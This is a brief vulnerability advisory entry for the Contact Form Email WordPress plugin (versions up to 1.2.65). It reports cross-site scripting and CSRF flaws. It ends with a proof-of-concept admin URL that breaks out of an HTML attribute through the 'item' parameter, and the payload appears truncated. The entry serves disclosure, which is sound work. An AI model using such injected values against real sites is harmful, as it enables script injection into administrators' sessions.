Contact Form Email <= 1.2.65 - Multiple Cross-Site Scripting (XSS) & CSRF

2019-02-05T00:00:00
ID WPVDB-ID:9227
Type wpvulndb
Reporter Ryan Dewhurst
Modified 2020-09-22T07:26:59

Description

The Contact Form Email WordPress plugin was affected by multiple Cross-Site Scripting (XSS) and CSRF vulnerabilities.

PoC

http://www.example.com/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item='">